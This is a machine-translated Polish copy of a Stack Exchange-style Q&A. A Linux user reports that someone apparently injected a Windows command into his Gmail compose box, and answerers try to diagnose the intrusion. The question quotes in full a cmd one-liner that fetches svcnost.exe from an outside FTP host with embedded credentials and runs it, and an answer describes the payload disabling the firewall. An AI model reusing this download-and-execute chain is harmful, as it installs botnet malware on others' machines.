Jak ustalić, czy mój komputer z Linuksem został zhakowany?

128

Mój domowy komputer jest zwykle włączony, ale monitor jest wyłączony. Tego wieczoru wróciłem do domu z pracy i znalazłem coś, co wygląda na próbę włamania: w mojej przeglądarce mój Gmail był otwarty (to byłem ja), ale był w trybie tworzenia z następującymi w TOpolu:

md / c echo otwórz cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe i echo wyjścia Masz własność

Dla mnie wygląda to na kod wiersza poleceń systemu Windows, a mdpoczątek kodu w połączeniu z faktem, że Gmail był w trybie tworzenia, pokazuje, że ktoś próbował uruchomić cmdpolecenie. Myślę, że miałem szczęście, że tak naprawdę nie uruchamiam Windowsa na tym komputerze, ale mam inne. To pierwszy raz, kiedy coś takiego mi się przytrafiło. Nie jestem guru Linuksa i wtedy nie korzystałem z innych programów poza Firefoksem.

Jestem absolutnie pewien, że tego nie napisałem i nikt inny nie był fizycznie przy moim komputerze. Ponadto ostatnio zmieniłem moje hasło Google (i wszystkie inne moje hasła) na coś podobnego, vMA8ogd7bvwięc nie sądzę, aby ktoś włamał się na moje konto Google.

Co się stało? Jak ktoś naciska klawisze na moim komputerze, kiedy to nie stara maszyna Windows babci od lat uruchamia złośliwe oprogramowanie, ale ostatnia nowa instalacja Ubuntu?

Aktualizacja:
Pozwól, że zajmę się niektórymi punktami i pytaniami:

  • Jestem w Austrii, na wsi. Mój router WLAN obsługuje WPA2 / PSK i hasło o średniej sile, którego nie ma w słowniku; musiałby być brutalny i oddalony o mniej niż 50 metrów; jest mało prawdopodobne, że został zhakowany.
  • Używam przewodowej klawiatury USB, więc ponownie bardzo mało prawdopodobne, aby ktokolwiek mógł być w zasięgu, aby ją zhakować.
  • Nie korzystałem wtedy z komputera; po prostu byłem bezczynny w domu, kiedy byłem w pracy. To komputer stacjonarny z monitorem, więc rzadko go wyłączam.
  • Maszyna ma tylko dwa miesiące, działa tylko na Ubuntu i nie używam dziwnego oprogramowania ani nie odwiedzam dziwnych stron. To głównie Stack Exchange, Gmail i gazety. Brak gier. Ubuntu jest na bieżąco.
  • Nie znam żadnej działającej usługi VNC; Na pewno nie zainstalowałem ani nie włączyłem. Nie uruchomiłem także żadnych innych serwerów. Nie jestem pewien, czy jakieś są domyślnie uruchomione w Ubuntu?
  • Znam wszystkie adresy IP związane z aktywnością konta Gmail. Jestem całkiem pewien, że Google nie był wejściem.
  • Znalazłem Przeglądarkę plików dziennika , ale nie wiem, czego szukać. Wsparcie?

To, co naprawdę chcę wiedzieć, i co naprawdę sprawia, że ​​czuję się niebezpiecznie, to: w jaki sposób każdy z Internetu może generować naciśnięcia klawiszy na moim komputerze? Jak mogę temu zapobiec, nie będąc w tym wszystkim cynobrowym kapeluszem? Nie jestem maniakiem Linuksa, jestem ojcem, który ma problemy z Windows od ponad 20 lat i mam tego dość. Przez ponad 18 lat bycia online nigdy osobiście nie widziałem żadnej próby włamania, więc jest to dla mnie nowość.

Torben Gundtofte-Bruun
źródło
4
Czy ktoś miał dostęp do twojego komputera, czy masz bardzo starą klawiaturę bezprzewodową? Ponadto Ubuntu ma wbudowany serwer VNC. Jeśli to jest aktywne, gdzieś losowy skrypt mógł się połączyć i założyć, że to komputer z systemem Windows, wysyłając naciśnięcia klawiszy WIN + R, cmd ......
TuxRug
29
@torbengb: Twój post naprawdę mnie przeraża ...
Mehrdad,
9
Czy w twojej sieci bezprzewodowej są jakieś inne komputery? Gdyby intruz złamał ich bezpieczeństwo, dałoby mu to „wejście” do twojej sieci lokalnej, co mogłoby doprowadzić do złamania Ubuntu na różne sposoby.
CarlF
4
@muntoo ... i jestem pewien, że nigdzie tego nie zapisałeś i nie używasz żadnej aplikacji do zarządzania nimi, prawda? Nie zaczynajmy bashowania hasłem; przynajmniej moje hasło nie jest password:-)
Torben Gundtofte-Bruun
6
Masz kota?
Zaki

Odpowiedzi:

66

Wątpię, żebyś miał się czym martwić. To był bardziej niż prawdopodobnie atak JavaScript, który próbował wykonać dysk przez pobranie . Jeśli martwi Cię to, zacznij korzystać z dodatków NoScript i AdBlock Plus Firefox.

Nawet odwiedzając wiarygodne strony, nie jesteś bezpieczny, ponieważ uruchamiają kod JavaScript od zewnętrznych reklamodawców, którzy mogą być złośliwi.

Złapałem go i uruchomiłem na maszynie wirtualnej. Zainstalował mirc i jest to dziennik stanu ... http://pastebin.com/Mn85akMk

Jest to zautomatyzowany atak, który próbuje zmusić cię do pobrania mIRC i dołączenia do botnetu, który zmieni cię w spambota ... Miał moją maszynę wirtualną, która dołączyła do wielu różnych zdalnych adresów, z których jednym jest autoemail-119.west320.com.

Uruchamiając go w systemie Windows 7 musiałem zaakceptować monit UAC i zezwolić na dostęp przez zaporę.

Wydaje się, że na innych forach jest mnóstwo raportów o tym dokładnym poleceniu, a ktoś nawet mówi, że plik torrent próbował go wykonać po zakończeniu pobierania ... Nie jestem jednak pewien, jak to byłoby możliwe.

Nie korzystałem z tego osobiście, ale powinien być w stanie pokazać bieżące połączenia sieciowe, abyś mógł sprawdzić, czy jesteś podłączony do czegoś nienormalnego: http://netactview.sourceforge.net/download.html

Riguez
źródło
10
Eee, dlaczego wszystkie komentarze (nawet te bardzo istotne , które odkryły, że skrypt próbował otworzyć cmdokno) zostały usunięte !?
BlueRaja - Danny Pflughoeft
Czy byłbym tak samo bezpieczny przed tego rodzaju atakami, gdybym zaczął używać uBlock Origin?
RobotUnderscore
42

Zgadzam się z @ jb48394, że to prawdopodobnie exploit JavaScript, podobnie jak wszystko inne w dzisiejszych czasach.

Fakt, że próbował otworzyć cmdokno (patrz komentarz @ torbengb ) i uruchomić złośliwe polecenie, a nie tylko dyskretnie pobierać trojana w tle, sugeruje, że wykorzystuje on pewną lukę w Firefoksie, która umożliwia mu wprowadzanie naciśnięć klawiszy, ale nie uruchamiać kodu.

To również wyjaśnia, dlaczego to wyczyn, który był wyraźnie napisane wyłącznie dla systemu Windows, będzie również pracować w systemie Linux: Firefox uruchamia kodu JavaScript w ten sam sposób we wszystkich OS'es (przynajmniej próbuje :)) . Gdyby było to spowodowane przepełnieniem bufora lub podobnym exploitem przeznaczonym dla systemu Windows, spowodowałoby to awarię programu.

Jeśli chodzi o to, skąd pochodzi kod JavaScript - prawdopodobnie złośliwa reklama Google (reklamy wyświetlają się w Gmailu przez cały dzień) . To nie będzie pierwszy raz .

BlueRaja - Danny Pflughoeft
źródło
4
Ładne referencje.
kizzx2
9
Informacje dla skimmerów, ten ostatni „link” to tak naprawdę pięć osobnych linków.
Wyskakuje
Byłoby to dość szokujące, gdyby naprawdę był exploitem Javascript, ponieważ mój Firefox zwykle pozostaje otwarty przez kilka dni. Należy jednak wywołać specjalny interfejs API, aby wysłać klucze do innego systemu w systemie Windows i prawdopodobnie do innego wywołania systemowego (jeśli istnieje) w systemie Linux. Ponieważ wysyłanie naciśnięć klawiszy nie jest normalną operacją Javascript, wątpię, by Firefox zaimplementowałby do tego wywołanie wieloplatformowe.
billc.cn
1
@ billc.cn: Wydaje mi się, że zapis do bufora klawiatury PS / 2 działa tak samo bez względu na system operacyjny .
BlueRaja - Danny Pflughoeft
12

Znalazłem podobny atak na inną maszynę z systemem Linux. Wygląda na to, że jest to rodzaj polecenia FTP dla systemu Windows.

Shekhar
źródło
8
Dokładniej, pobiera i uruchamia plik ftp://ccteam10:[email protected]/svcnost.exeza pomocą ftpnarzędzia wiersza polecenia systemu Windows .
grawity
znalazłem to również na pastebin pastebin.com/FXwRpKH4
Shekhar
tutaj jest informacja o stronie whois.domaintools.com/216.210.179.67
Shekhar
9
Jest to pakiet WinRAR SFX zawierający przenośną instalację mIRC i plik o nazwie „DriverUpdate.exe”. DriverUpdate.exe wykonuje (przynajmniej) dwa polecenia powłoki: netsh firewall ustaw opmode disable i taskkill / F / IM VCSPAWN.EXE / T Próbuje również (myślę) dodać die-freesms-seite.com do strefy zaufanej Internet Explorera i obejście proxy.
Andrew Lambert,
5

To nie odpowiada na całe pytanie, ale w pliku dziennika poszukaj nieudanych prób logowania.

Jeśli w twoim dzienniku jest więcej niż pięć nieudanych prób, ktoś próbował złamać root. Jeśli próba zalogowania się zakończy się powodzeniem, rootgdy nie ma Cię przy komputerze, NATYCHMIAST ZMIEŃ HASŁO !! Mam na myśli PRAWO TERAZ! Najlepiej niż coś alfanumerycznego i około 10 znaków.

Z otrzymanymi wiadomościami ( echopolecenia) to naprawdę brzmi jak jakiś niedojrzały dzieciak . Gdyby to był prawdziwy haker, który wiedziałby, co robi, prawdopodobnie nadal nie wiedziałbyś o tym.

Nate Koppenhaver
źródło
2
Zgadzam się, że to było oczywiście bardzo amatorskie. Przynajmniej nie powinni byli na końcu powtarzać echa, którego jesteś właścicielem . Zastanawiam się, czy kiedykolwiek przeszli „prawdziwi hakerzy”? A może powinienem zapytać, ile?
Torben Gundtofte-Bruun
1
@torgengb: jeśli polecenie uruchomiono w wierszu polecenia systemu Windows, nie zobaczyłbyś echa (z powodu &exit)
BlueRaja - Danny Pflughoeft,
-1

whois raporty west320.com jest własnością Microsoft.

UPnP i Vino (System -> Preferencje -> Pulpit zdalny) w połączeniu ze słabym hasłem Ubuntu?

Czy korzystałeś z niestandardowych repozytoriów?

DEF CON co roku organizuje konkurs Wi-Fi na odległość, do której można dotrzeć do punktu dostępu Wi-Fi - ostatnio słyszałem, że było to 250 mil.

Jeśli naprawdę chcesz się bać, spójrz na zrzuty ekranu centrum dowodzenia botnetu Zeus . Żadna maszyna nie jest bezpieczna, ale Firefox w systemie Linux jest bezpieczniejszy niż reszta. Jeszcze lepiej, jeśli uruchomisz SELinux .

rjt
źródło
1
Autor tego exploita najwyraźniej nie miał zamiaru uruchamiać go w systemie Linux, więc wątpię, by miało to coś wspólnego z podatnym narzędziem gnome lub słabym hasłem (również OP wspomniał, że ma bezpieczne hasło)
BlueRaja - Danny Pflughoeft
W rzeczywistości nie wspomina o haśle Ubuntu, tylko o Gmailu i bezprzewodowym haśle. Dziecko z metasploitem może nawet nie wiedzieć o Linuksie, po prostu widzi VNC. Najprawdopodobniej jest to atak javascript.
rjt